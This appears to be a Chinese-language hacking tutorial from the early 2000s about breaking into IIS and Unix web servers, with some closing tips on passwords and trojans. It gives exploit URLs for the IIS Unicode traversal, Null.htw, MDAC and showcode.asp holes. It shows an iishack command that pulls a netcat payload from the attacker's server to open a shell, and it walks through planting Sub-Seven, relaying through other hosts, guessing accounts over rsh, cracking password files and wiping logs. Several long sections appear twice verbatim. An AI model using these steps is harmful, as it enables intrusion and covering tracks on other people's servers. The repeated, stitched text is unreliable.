   上面介绍的是通过UNICODE漏洞进行入侵的过程,在微软的IIS中还有更多的漏洞可以利用:
   1、Null.htw
   IIS如果运行了Index Server就包含了一个通过Null.htw有关的漏洞,即服务器上不存在此.htw结尾的文件。这个漏洞会导致显示ASP脚本的源代码,global.asa里面包含了用户帐户等敏感信息。如果攻击者提供特殊的URL请求给IIS就可以跳出虚拟目录的限制,进行逻辑分区和ROOT目录的访问。而这个“hit-highlighting”功能在Index Server中没有充分防止各种类型文件的请求,所以导致攻击者访问服务器上的任意文件。Null.htw功能可以从用户输入中获得3个变量:CiWebhitsfile、CiRestriction、CiHiliteType,可通过下列方法传递变量来获得任意asp文件的源代码:
   http://www.sample.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full其中不需要一个合法的.htw文件是因为虚拟文件已经存储在内存中了。
   2、MDAC执行本地命令漏洞:
   这个漏洞出现得比较早,但在全球范围内,可能还有好多IIS WEB服务器存在这个漏洞,就像在今天还有很多人在用Windows3.2一样。IIS的MDAC组件存在一个漏洞,可以导致攻击者远程执行目标系统的命令。主要核心问题是存在于RDSDatafactory,默认情况下,它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,在默认情况下是SYSTEM用户。黑客通过以下办法测试本机是否存在这个漏洞:
   c:\>nc -nw -w 2 <目标机> 80
   GET /msadc/msadcs.dll HTTP
   如果得到信息“application/x_varg”就很有可能存在此漏洞且没有打上补丁,可以使用rain forest puppy网站的两个程序进行测(www.wiretrip.net/rfp)==>mdac.pl和msadc2.pl。
   3、idc、ida 漏洞:
   这个漏洞实际上类似于早期的ASP dot漏洞,其能在IIS4.0上显示WEB目录信息,很奇怪有些人还在IIS5.0上发现过此类漏洞,通过增加?idc?或者?ida?后缀到URL会导致IIS尝试允许通过数据库连接程序.DLL来运行.IDC,如果此.idc不存在,它就返回一些信息给客户端,检测漏洞方法是:http://www.sample.com/anything.idc 或者 http://www.sample.com/anything.idq
   4、IIS HACK
   有人发现了一个IIS4.0的缓冲溢出漏洞,可以允许用户上载程序,如上载netcat到目标服务器,并把cmd.exe绑定到80端口。这个缓冲溢出主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到站点www.technotronic.com中去下载,另外你还需要一台自己的WEB服务器,也可以是虚拟服务器。先在自己的WEB服务器上运行WEB服务程序并把ncx.exe放到相应的目录下,然后使用iishack.exe来检查目标机器:c:\>iishack.exe <目标机> 80 <自己的WEB服务器>/ncx.exe
   然后使用netcat来连接要检测的服务器:c:\>nc <目标机> 80,如果溢出点正确,就可以看到目标机器的命令行提示,并且是远程管理权限。
   5、Codebrws.asp和Showcode.asp:
   这是两个IIS4.0附带的阅读文件程序,但不是默认安装的,这个查看器是在管理员允许查看样例文件作为联系的情况下安装的。但是这个查看器并没有很好地限制所访问的文件,远程攻击者可以利用这个漏洞来查看目标机器上的任意文件内容,但要注意以下几点:
   (1)Codebrws.asp 和 Showcode.asp默认情况下不安装;
   (2)漏洞仅允许查看文件内容;
   (3)这个漏洞不能绕过WINDOWS NT的ACL控制列表的限制;
   (4)只允许同一分区下的文件可以被查看;
   (5)攻击者需要知道请求的文件名。
   例如你发现存在这个文件并符合上面的要求,则可以请求如下的命令察看asp源代码:
   http://www.sample.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
   http://www.sample.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
三、如何防范IIS漏洞:
   由于微软的IIS是一套商业软件,他们并没有公开这套软件的源代码,所以软件的补丁程序只能等待微软公司在它的产品升级主页下载,这比起Apache等开放源代码的应用程序,可能在安全性上体现的更差,这也正是为什么黑客都说“微软的东西玩儿起来没有意思”,因为这个被封闭的很严的软件产品,既没有源代码可供黑客分析,一旦出现了问题也只能做一些基本的操作进行黑客(也就是上面的内容),这对初学黑客的人来说自然是一件好事情,但对高级黑客是不屑一顾的。
   微软公司的主页是http://www.microsoft.com/,但是没有很多人愿意从国外下载软件补丁回来,国内也有很多不错的网络安全主页,例如http://www.xfocus.orghttp://www.nsfocus.com/main.php等都是非常不错的,读者可以到这些站点阅读最新的安全公告或下载升级补丁。
   另外对于codebrws.asp等程序造成的安全问题,这不是产品本身存在漏洞,而属于管理员在安装软件是的疏忽造成的,因此管理员安装完系统之后,一定要使用漏洞扫描软件对自己的系统进行检测,确认没有提供任何存在问题的程序给使用者,对于codebrws.asp等软件如果必须安装,也可以更换文件名或改变它的目录位置,这样黑客就无法从漏洞扫描的途径发现这些文件的存在了。
四、另一次入侵过程:
   假设这次攻击的目标是www.soft.com,首先使用ping命令察看一下对方系统的应答时间ping www.soft.com
       Pinging www.soft.com [127.168.0.1] with 32 bytes of data:
       Reply from 127.168.0.1: bytes=32 time=425ms TTL=240
       Reply from 127.168.0.1: bytes=32 time=420ms TTL=240
       Reply from 127.168.0.1: bytes=32 time=419ms TTL=240
       Reply from 127.168.0.1: bytes=32 time=421ms TTL=240
   看上去,time还是比较快的,而且通过TTL猜测到对方使用的是Linux之类的系统,比较有挑战性。使用nc命令(NT中提供)登陆到其他主机上,这在黑客里的行话叫“跳板”,我到更觉得像是“借刀杀人”,因为登陆到其他服务器上进行攻击,那么收到攻击的服务器将会纪录下那个黑客登陆的服务器,而不会纪录黑客真正的IP地址,这样一旦追踪起来,黑客的真实位置不容易被发现。
   之后使用端口扫描程序对目标127.168.0.1进行扫描,看看它开放了什么端口:结果是开放了十多个端口,提供的服务越多、服务器存在漏洞的可能性就越大!之后分别用不同的检测方法检测每一个服务可能存在的漏洞,因为我们主要介绍80端口的攻击,所以其他攻击过程在这里设略,直接进行80端口的检测:
# (echo "head /http/1.0";echo;echo)|./nc -w 3 127.168.0.1 80
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<title>501 Method Not Implemented</title>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
head to /http/1.0 not supported.<P>
Invalid method in request head /http/1.0<P>
<HR>
<ADDRESS>Apache/1.3.9 Server at 127-168-0-1 Port 80</ADDRESS>
</BODY></HTML>
   看到<ADDRESS>内的系统版本了吗?这说明服务器的确使用的Linux等系统,而且服务器使用的是Apache版本,因为这是一套开放了源代码的软件,所以它被世界上所有顶尖黑客所关注,其中的漏洞很快会被发现,而相应的对策也能够及时出台,所以它从诞生到现在,更新速度是惊人的,其安全程度也是非常惊人的,存在漏洞的希望并不大,作为初学者一般应该放弃,但是我还是介绍一下剩下来的工作,让读者从感性上接触一下黑客攻击的全部过程。
   使用finger调出服务器上的用户列表,如果成功的话则可以使用+ username命令为自己增加一个用户登陆权限。使用下面的脚本将可能的用户列表逐个寻找出来:
       # chmod 700 rsh.sh
       # nohup ./rsh.sh www.targe.com
   这会自动的在/etc/passwd和/etc/shadow里加上finger出来的用户名,再对远程目标127.168.0.1执行rsh命令,成功则返回该用户名,这个操作需要很长的时间,也许是几个小时后也不能获得什么有用的信息,因此这里需要一点点运气。等待一段时间后,读取报告结果:
       # cat ./.rsh.txt
       guest
   报告结果文件“.rsh.txt”中获得了一个guest用户名(初学者很难有如此好的运气),通过rlogin登陆这个用户名看看有什么权限:
       # rlogin -l guest 127.168.0.1

       Last login: Fri Jan 12 03:01:10 from 61.135.50.24
       Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
       The Regents of the University of California. All rights reserved.

       FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 2001
       You have mail.
   到这里,我就已经登陆进入这台服务器了,现在我的权限可能还很小,不过已经能够称的上“入侵”了,后面的内容对初学者来说就真是没有介绍的必要了,因为后面牵扯的大多数命令都是初学者闻所未闻的,因此只做一个大概介绍。如果这个guest具有对/etc/passwd的访问权限,可以将passwd文件读取出来,这是Linux系统下纪录用户名和密码的文件,它的基本格式如下:
       root:*:0:0:Charlie &:/root:/usr/local/bin/bash
       guest:*:1005:2000::/home/www:/usr/local/bin/tcsh
       max:*:1006:1006::/home/max:/usr/local/bin/tcsh
       someone:*:1003:1003::/home/someone:/usr/local/bin/tcsh
   看到这个文件的话,就可以想办法获得shadow文件并利用JOHN等软件破解其中的DES加密密码,那是一个非常有意思的工作,主要是看自己的电脑速度和字典档案的优劣,很多黑客都是非常喜欢在自己的电脑上破解DES密码档案的,可以再一次使用破解出来的用户名登陆服务器,看看它的权限,直到找到最高的权限(完全控制服务器)。
   最后在离开服务器的时候,要清除日志文件,当然因为我们这次进攻是通过跳板的,所以不清楚日志管理员也很难找到我,再说我也没有进行让破坏,所以管理员并不会注意到这次进攻,在他看来只不过使用户guest登陆到服务器上随便看看又下去了。
五、保护密码:
   对于我们这些拨号上网的用户来说,最怕的就是有居心叵测的黑客对我们进行攻击了,如何能避免个人的利益遭到损坏呢?这里总结了一些我对密码保护的看法和防范密码泄漏的对策,希望对广大读者有一定的作用。
   1、经常修改密码
   密码是我们最重要的个人隐私,如果黑客知道了我们的上网密码或者Email密码,那我们将无任何隐私可言,所以一定要选择一个比较好的密码,同时还要经常更换。一般来说,大多数人喜欢选择一些比较容易记忆的英文单词,这是非常不安全的,黑客不用什么高深的手法,只要用软件进行猜测,用不了半个小时,五位的英文单词就会被他们猜出来,所以一定要选择一个毫无意义的字符排列作为密码。这里有几条规则:
   (1)好的密码应该很长,至少七位或者八位;
   (2)有必要经常更换密码,每月改变一次自己的密码将是非常明智的选择;
   (3)密码不要单独依靠字符、数字,应该尽量混合所有的符号;
   (4)英文字母不要使用单词,应该使用没有任何规律的随机排列;
   (5)不要使用例如生日、电话号码等数字作为密码;
   (6)英文字母应该大小写都出现;
   (7)给出一个比较好的密码形式:
   2、使用“拨号后出现终端窗口”功能
   这种方法的好处是不会将密码文件保存到电脑中,如果让电脑自动完成拨号功能,那么系统将会把您的密码保存到一个扩展名为pwl 的文件中,这样一来,有经验的人很快就可以通过特殊方法获得您的pwl 文件并找到其中的密码。具体使用“拨号后出现终端窗口”的方法如下:
   选中某一连接图标,单击鼠标右键,选“属性- 常规- 配置- 选项- 拨号后出现终端窗口”,然后拨号时,在拨号界面上不要填入用户名和密码(更不要选中“保存密码”项),在出现拨号终端窗口后再进行相应的输入,这可以避免用户名和密码被记录到硬盘上的密码文件中,同时,也可以避免被某些黑客程序捕获用户名和密码。
   3、对付特洛伊木马
   特洛伊木马程序常被定义为当执行一个任务时却实际上执行着另一个任务的程序,典型的一个例子是:伪造一个登录界面,当用户在这个界面上输入用户名和密码时,程序将它们转移到一个隐蔽的文件中,然后提示错误要求用户再输入一遍,程序这时再调用真正的登录界面让用户登录,于是在用户几乎毫无察觉的情况下就得到了记录有用户名和密码的文件。现在互联网上有许多所谓的特洛伊木马程序,像著名的BO、Backdoor、Netbus及国内的Netspy等等。严格地说,它们属于客户机/服务器(C /S )程序,因为它们往往带有一个用于驻留在用户机器上的服务器程序,以及一个用于访问用户机器的客户端程序,就好像NT的Server和Workstation 的关系一样。
   在对付特洛伊木马程序方面,有以下几种办法:
   (1)多读readme.txt
   许多人出于研究目的下载了一些特洛伊木马程序的软件包,在没有弄清软件包中几个程序的具体功能前,就匆匆地执行其中的程序,这样往往就错误地执行了服务器端程序而使用户的计算机成为了特洛伊木马的牺牲品。软件包中经常附带的readme.txt文件会有程序的详细功能介绍和使用说明,尽管它一般是英文的,但还是有必要先阅读一下,如果实在读不懂,那最好不要执行任何程序,丢弃软件包当然是最保险的了。有必要养成在使用任何程序前先读readme.txt的好习惯。
   值得一提的是,有许多程序说明做成可执行的readme.exe形式,readme.exe往往捆绑有病毒或特洛伊木马程序,或者干脆就是由病毒程序、特洛伊木马的服务器端程序改名而得到的,目的就是让用户误以为是程序说明文件去执行它,可谓用心险恶。所以从互联网上得来的readme.exe最好不要执行它。
   (2)使用杀毒软件
   现在国内的杀毒软件都推出了清除某些特洛伊木马的功能,如KV300 、KILL98、瑞星等等,可以不定期地在脱机的情况下进行检查和清除。
   另外,有的杀毒软件还提供网络实时监控功能,这一功能可以在黑客从远端执行用户机器上的文件时,提供报警或让执行失败,使黑客向用户机器上载可执行文件后无法正确执行,从而避免了进一步的损失。
   (3)立即挂断
   尽管造成上网速度突然变慢的原因有很多,但有理由怀疑这是由特洛伊木马造成的,当入侵者使用特洛伊的客户端程序访问你的机器时,会与你的正常访问抢占宽带,特别是当入侵者从远端下载用户硬盘上的文件时,正常访问会变得奇慢无比。这时,你可以双击任务栏右下角的连接图标,仔细观察一下“已发送字节”项,如果发送字节变化在1 ~3kbps (每秒1 ~3 千字节),几乎可以确认有人在下载你的硬盘文件,除非你正在使用ftp功能。对TCP/IP端口熟悉的用户,可以在“MS-DOS 方式”下键入“netstat -a”来观察与你机器相连的当前所有通信进程,当有具体的IP正使用不常见的端口(一般大于1024)与你通信时,这一端口很可能就是特洛伊木马的通信端口。当发现上述可疑迹象后,你所能做的就是:立即挂断,然后对硬盘有无特洛伊木马进行认真的检查。

第二节、实际攻击
一、中美黑客对战中的UNICODE漏洞利用:
   2001年4月开始,中美黑客又一次在网络上展开了没有硝烟的战斗,这次黑客攻击主要是依靠UNICODE漏洞,利用这个漏洞黑客可以远程调用服务器的cmd命令解释器,对服务器磁盘进行各种操作,配合上传的木马等程序,这个漏洞载当时给互联网带来的威胁是巨大的。
   1、UNICODE原理:
   此漏洞从中文IIS4.0+SP6开始出现,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。UNICODE是一种编码格式,它可以用两组代码编制一个字符,例如下面在中文Windows2000中的编码规则就是黑客需要利用到的:
       %c1%1c -〉 (0xc1 – 0xc0) * 0×40 + 0×1c = 0×5c = ‘/’
       %c0%2f -〉 (0xc0 – 0xc0) * 0×40 + 0×2f = 0×2f = ‘\’
   黑客利用“%c1%1c”和“%c0%2f”两个不完整的编码,通过系统转换可以得到正、反斜杠,这样就可以访问远程服务器上的为开放的目录内容了。例如对于http://www.acc.com/来说,它的webroot目录如果是c:\webroot\,那么当黑客使用http://www.acc.com/scripts/..%c1%1c../winnt/system32/cmd.exe实际上被编码之后是:http://www.acc.com/scripts/../../winnt/system32/cmd.exe,也就是说黑客直接通过浏览器就调用了服务器上的cmd命令解释器,获得了远程执行命令的权限。
   2、检测方法:
   如果怀疑某个网站存在这个程序,可以通过下面的方法进行检测:
   http://www.pim.cn/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
   如果系统的确存在漏洞的话,那么浏览器返回的内容将会是对方系统的硬盘目录内容,注意因为UNICODE在不同的系统中有不同的编码,所以不能依靠一组代码确定服务器上不存在这个漏洞。这个时候扫描器就派上了大用场,使用xscanner可以专门对多个UNICODE进行检测,它的使用参数是“-iis”。
   3、分析漏洞:
   获得了控制台命令的执行权限,就意味着黑客可以执行dir、copy、echo、net等多个命令,也就是说黑客可以浏览、删除服务器硬盘上的文件,还可以使用net命令打开服务器的某个目录的共享状态,然后上传木马并继续使用控制台命令调用木马。
   例如http://www.acc.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\game可以使用dir命令列出服务器的c:\game目录中(如果有的话)的文件列表,将“/c+dir+”更改成“/c+del+”既可以删除后面指定的文件了。
   4、完整利用:
   现在假设学习者手中拥有sub-seven木马和一台已经确认具有UNICODE漏洞的服务器,之后所要做的事情就是单纯的利用浏览器和木马程序就可以完全控制服务器了。
   首先利用扫描器找到一台具有IISCODE漏洞的服务器(例如http://www.bnc.org/),然后通过浏览器完成下面的工作:
   http://www.bnc.org/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
   这样可以通过漏洞看到硬盘上的文件列表,地址行中的“..%c1%1c..”在不同的系统中可能不同,它的意思是经过UNICODE编码转变成符号“../..”,如果看到了文件列表说明漏洞的确存在,之后将cmd.exe文件复制到scripts目录下:
   /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\webroot\scripts\abc.exe
   这样就将cmd.exe程序保存到scripts/目录下,并且将它的文件名更改为abc.exe,如果不更改名称,系统将不会在其他目录中运行cmd.exe。这之后可以用/scripts/abc.exe?/c+dir+c:\game等形式直接调用cmd.exe命令。
   使用cmd.exe配合net命令可以在对方的系统上开辟一个共享目录,这个目录可以设置为整个驱动器,有关net use的介绍已经在第二章中提到,在这里不再过多做解释。开辟了共享目录后,既可以通过“网上邻居”直接连接到对方的系统上\\www.bnc.org\,之后上传木马程序sub-seven的服务端到scripts下。
   最后调用并激活木马程序/scripts/sub-seven.exe,这样所有入侵工作全部完成了。之后在本地电脑上运行sub-seven的客户端程序,并在IP地址内输入对方的IP,控制对方系统。进入系统之后,要注意删除c:\winnt\log下的日志文件,这样系统管理员就不会发现此次入侵活动了。
二、更多的漏洞:
   上面介绍的是通过UNICODE漏洞进行入侵的过程,在微软的IIS中还有更多的漏洞可以利用:
   1、Null.htw
   IIS如果运行了Index Server就包含了一个通过Null.htw有关的漏洞,即服务器上不存在此.htw结尾的文件。这个漏洞会导致显示ASP脚本的源代码,global.asa里面包含了用户帐户等敏感信息。如果攻击者提供特殊的URL请求给IIS就可以跳出虚拟目录的限制,进行逻辑分区和ROOT目录的访问。而这个“hit-highlighting”功能在Index Server中没有充分防止各种类型文件的请求,所以导致攻击者访问服务器上的任意文件。Null.htw功能可以从用户输入中获得3个变量:CiWebhitsfile、CiRestriction、CiHiliteType,可通过下列方法传递变量来获得任意asp文件的源代码:
   http://www.sample.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full其中不需要一个合法的.htw文件是因为虚拟文件已经存储在内存中了。
   2、MDAC执行本地命令漏洞:
   这个漏洞出现得比较早,但在全球范围内,可能还有好多IIS WEB服务器存在这个漏洞,就像在今天还有很多人在用Windows3.2一样。IIS的MDAC组件存在一个漏洞,可以导致攻击者远程执行目标系统的命令。主要核心问题是存在于RDSDatafactory,默认情况下,它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,在默认情况下是SYSTEM用户。黑客通过以下办法测试本机是否存在这个漏洞:
   c:\>nc -nw -w 2 <目标机> 80
   GET /msadc/msadcs.dll HTTP
   如果得到信息“application/x_varg”就很有可能存在此漏洞且没有打上补丁,可以使用rain forest puppy网站的两个程序进行测(www.wiretrip.net/rfp)==>mdac.pl和msadc2.pl。
   3、idc、ida 漏洞:
   这个漏洞实际上类似于早期的ASP dot漏洞,其能在IIS4.0上显示WEB目录信息,很奇怪有些人还在IIS5.0上发现过此类漏洞,通过增加?idc?或者?ida?后缀到URL会导致IIS尝试允许通过数据库连接程序.DLL来运行.IDC,如果此.idc不存在,它就返回一些信息给客户端,检测漏洞方法是:http://www.sample.com/anything.idc 或者 http://www.sample.com/anything.idq
   4、IIS HACK
   有人发现了一个IIS4.0的缓冲溢出漏洞,可以允许用户上载程序,如上载netcat到目标服务器,并把cmd.exe绑定到80端口。这个缓冲溢出主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到站点www.technotronic.com中去下载,另外你还需要一台自己的WEB服务器,也可以是虚拟服务器。先在自己的WEB服务器上运行WEB服务程序并把ncx.exe放到相应的目录下,然后使用iishack.exe来检查目标机器:c:\>iishack.exe <目标机> 80 <自己的WEB服务器>/ncx.exe
   然后使用netcat来连接要检测的服务器:c:\>nc <目标机> 80,如果溢出点正确,就可以看到目标机器的命令行提示,并且是远程管理权限。
   5、Codebrws.asp和Showcode.asp:
   这是两个IIS4.0附带的阅读文件程序,但不是默认安装的,这个查看器是在管理员允许查看样例文件作为联系的情况下安装的。但是这个查看器并没有很好地限制所访问的文件,远程攻击者可以利用这个漏洞来查看目标机器上的任意文件内容,但要注意以下几点:
   (1)Codebrws.asp 和 Showcode.asp默认情况下不安装;
   (2)漏洞仅允许查看文件内容;
   (3)这个漏洞不能绕过WINDOWS NT的ACL控制列表的限制;
   (4)只允许同一分区下的文件可以被查看;
   (5)攻击者需要知道请求的文件名。
   例如你发现存在这个文件并符合上面的要求,则可以请求如下的命令察看asp源代码:
   http://www.sample.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
   http://www.sample.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
三、如何防范IIS漏洞:
   由于微软的IIS是一套商业软件,他们并没有公开这套软件的源代码,所以软件的补丁程序只能等待微软公司在它的产品升级主页下载,这比起Apache等开放源代码的应用程序,可能在安全性上体现的更差,这也正是为什么黑客都说“微软的东西玩儿起来没有意思”,因为这个被封闭的很严的软件产品,既没有源代码可供黑客分析,一旦出现了问题也只能做一些基本的操作进行黑客(也就是上面的内容),这对初学黑客的人来说自然是一件好事情,但对高级黑客是不屑一顾的。
   微软公司的主页是http://www.microsoft.com/,但是没有很多人愿意从国外下载软件补丁回来,国内也有很多不错的网络安全主页,例如http://www.xfocus.orghttp://www.nsfocus.com/main.php等都是非常不错的,读者可以到这些站点阅读最新的安全公告或下载升级补丁。
   另外对于codebrws.asp等程序造成的安全问题,这不是产品本身存在漏洞,而属于管理员在安装软件是的疏忽造成的,因此管理员安装完系统之后,一定要使用漏洞扫描软件对自己的系统进行检测,确认没有提供任何存在问题的程序给使用者,对于codebrws.asp等软件如果必须安装,也可以更换文件名或改变它的目录位置,这样黑客就无法从漏洞扫描的途径发现这些文件的存在了。
四、另一次入侵过程:
   假设这次攻击的目标是www.soft.com,首先使用ping命令察看一下对方系统的应答时间ping www.soft.com
       Pinging www.soft.com [127.168.0.1] with 32 bytes of data:
       Reply from 127.168.0.1: bytes=32 time=425ms TTL=240
       Reply from 127.168.0.1: bytes=32 time=420ms TTL=240
       Reply from 127.168.0.1: bytes=32 time=419ms TTL=240
       Reply from 127.168.0.1: bytes=32 time=421ms TTL=240
   看上去,time还是比较快的,而且通过TTL猜测到对方使用的是Linux之类的系统,比较有挑战性。使用nc命令(NT中提供)登陆到其他主机上,这在黑客里的行话叫“跳板”,我到更觉得像是“借刀杀人”,因为登陆到其他服务器上进行攻击,那么收到攻击的服务器将会纪录下那个黑客登陆的服务器,而不会纪录黑客真正的IP地址,这样一旦追踪起来,黑客的真实位置不容易被发现。
   之后使用端口扫描程序对目标127.168.0.1进行扫描,看看它开放了什么端口:结果是开放了十多个端口,提供的服务越多、服务器存在漏洞的可能性就越大!之后分别用不同的检测方法检测每一个服务可能存在的漏洞,因为我们主要介绍80端口的攻击,所以其他攻击过程在这里设略,直接进行80端口的检测:
# (echo "head /http/1.0";echo;echo)|./nc -w 3 127.168.0.1 80
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<title>501 Method Not Implemented</title>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
head to /http/1.0 not supported.<P>
Invalid method in request head /http/1.0<P>
<HR>
<ADDRESS>Apache/1.3.9 Server at 127-168-0-1 Port 80</ADDRESS>
</BODY></HTML>
   看到<ADDRESS>内的系统版本了吗?这说明服务器的确使用的Linux等系统,而且服务器使用的是Apache版本,因为这是一套开放了源代码的软件,所以它被世界上所有顶尖黑客所关注,其中的漏洞很快会被发现,而相应的对策也能够及时出台,所以它从诞生到现在,更新速度是惊人的,其安全程度也是非常惊人的,存在漏洞的希望并不大,作为初学者一般应该放弃,但是我还是介绍一下剩下来的工作,让读者从感性上接触一下黑客攻击的全部过程。
   使用finger调出服务器上的用户列表,如果成功的话则可以使用+ username命令为自己增加一个用户登陆权限。使用下面的脚本将可能的用户列表逐个寻找出来:
       # chmod 700 rsh.sh
       # nohup ./rsh.sh www.targe.com
   这会自动的在/etc/passwd和/etc/shadow里加上finger出来的用户名,再对远程目标127.168.0.1执行rsh命令,成功则返回该用户名,这个操作需要很长的时间,也许是几个小时后也不能获得什么有用的信息,因此这里需要一点点运气。等待一段时间后,读取报告结果:
       # cat ./.rsh.txt
       guest
   报告结果文件“.rsh.txt”中获得了一个guest用户名(初学者很难有如此好的运气),通过rlogin登陆这个用户名看看有什么权限:
       # rlogin -l guest 127.168.0.1

       Last login: Fri Jan 12 03:01:10 from 61.135.50.24
       Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
       The Regents of the University of California. All rights reserved.

       FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 2001
       You have mail.
   到这里,我就已经登陆进入这台服务器了,现在我的权限可能还很小,不过已经能够称的上“入侵”了,后面的内容对初学者来说就真是没有介绍的必要了,因为后面牵扯的大多数命令都是初学者闻所未闻的,因此只做一个大概介绍。如果这个guest具有对/etc/passwd的访问权限,可以将passwd文件读取出来,这是Linux系统下纪录用户名和密码的文件,它的基本格式如下:
       root:*:0:0:Charlie &:/root:/usr/local/bin/bash
       guest:*:1005:2000::/home/www:/usr/local/bin/tcsh
       max:*:1006:1006::/home/max:/usr/local/bin/tcsh
       someone:*:1003:1003::/home/someone:/usr/local/bin/tcsh
   看到这个文件的话,就可以想办法获得shadow文件并利用JOHN等软件破解其中的DES加密密码,那是一个非常有意思的工作,主要是看自己的电脑速度和字典档案的优劣,很多黑客都是非常喜欢在自己的电脑上破解DES密码档案的,可以再一次使用破解出来的用户名登陆服务器,看看它的权限,直到找到最高的权限(完全控制服务器)。
   最后在离开服务器的时候,要清除日志文件,当然因为我们这次进攻是通过跳板的,所以不清楚日志管理员也很难找到我,再说我也没有进行让破坏,所以管理员并不会注意到这次进攻,在他看来只不过使用户guest登陆到服务器上随便看看又下去了。
五、保护密码:
   对于我们这些拨号上网的用户来说,最怕的就是有居心叵测的黑客对我们进行攻击了,如何能避免个人的利益遭到损坏呢?这里总结了一些我对密码保护的看法和防范密码泄漏的对策,希望对广大读者有一定的作用。
   1、经常修改密码
   密码是我们最重要的个人隐私,如果黑客知道了我们的上网密码或者Email密码,那我们将无任何隐私可言,所以一定要选择一个比较好的密码,同时还要经常更换。一般来说,大多数人喜欢选择一些比较容易记忆的英文单词,这是非常不安全的,黑客不用什么高深的手法,只要用软件进行猜测,用不了半个小时,五位的英文单词就会被他们猜出来,所以一定要选择一个毫无意义的字符排列作为密码。这里有几条规则:
   (1)好的密码应该很长,至少七位或者八位;
   (2)有必要经常更换密码,每月改变一次自己的密码将是非常明智的选择;
   (3)密码不要单独依靠字符、数字,应该尽量混合所有的符号;
   (4)英文字母不要使用单词,应该使用没有任何规律的随机排列;
   (5)不要使用例如生日、电话号码等数字作为密码;
   (6)英文字母应该大小写都出现;
   (7)给出一个比较好的密码形式:
   2、使用“拨号后出现终端窗口”功能
   这种方法的好处是不会将密码文件保存到电脑中,如果让电脑自动完成拨号功能,那么系统将会把您的密码保存到一个扩展名为pwl 的文件中,这样一来,有经验的人很快就可以通过特殊方法获得您的pwl 文件并找到其中的密码。具体使用“拨号后出现终端窗口”的方法如下:
   选中某一连接图标,单击鼠标右键,选“属性- 常规- 配置- 选项- 拨号后出现终端窗口”,然后拨号时,在拨号界面上不要填入用户名和密码(更不要选中“保存密码”项),在出现拨号终端窗口后再进行相应的输入,这可以避免用户名和密码被记录到硬盘上的密码文件中,同时,也可以避免被某些黑客程序捕获用户名和密码。
   3、对付特洛伊木马
   特洛伊木马程序常被定义为当执行一个任务时却实际上执行着另一个任务的程序,典型的一个例子是:伪造一个登录界面,当用户在这个界面上输入用户名和密码时,程序将它们转移到一个隐蔽的文件中,然后提示错误要求用户再输入一遍,程序这时再调用真正的登录界面让用户登录,于是在用户几乎毫无察觉的情况下就得到了记录有用户名和密码的文件。现在互联网上有许多所谓的特洛伊木马程序,像著名的BO、Backdoor、Netbus及国内的Netspy等等。严格地说,它们属于客户机/服务器(C /S )程序,因为它们往往带有一个用于驻留在用户机器上的服务器程序,以及一个用于访问用户机器的客户端程序,就好像NT的Server和Workstation 的关系一样。
   在对付特洛伊木马程序方面,有以下几种办法:
   (1)多读readme.txt
   许多人出于研究目的下载了一些特洛伊木马程序的软件包,在没有弄清软件包中几个程序的具体功能前,就匆匆地执行其中的程序,这样往往就错误地执行了服务器端程序而使用户的计算机成为了特洛伊木马的牺牲品。软件包中经常附带的readme.txt文件会有程序的详细功能介绍和使用说明,尽管它一般是英文的,但还是有必要先阅读一下,如果实在读不懂,那最好不要执行任何程序,丢弃软件包当然是最保险的了。有必要养成在使用任何程序前先读readme.txt的好习惯。
   值得一提的是,有许多程序说明做成可执行的readme.exe形式,readme.exe往往捆绑有病毒或特洛伊木马程序,或者干脆就是由病毒程序、特洛伊木马的服务器端程序改名而得到的,目的就是让用户误以为是程序说明文件去执行它,可谓用心险恶。所以从互联网上得来的readme.exe最好不要执行它。
   (2)使用杀毒软件
   现在国内的杀毒软件都推出了清除某些特洛伊木马的功能,如KV300 、KILL98、瑞星等等,可以不定期地在脱机的情况下进行检查和清除。
   另外,有的杀毒软件还提供网络实时监控功能,这一功能可以在黑客从远端执行用户机器上的文件时,提供报警或让执行失败,使黑客向用户机器上载可执行文件后无法正确执行,从而避免了进一步的损失。
   (3)立即挂断
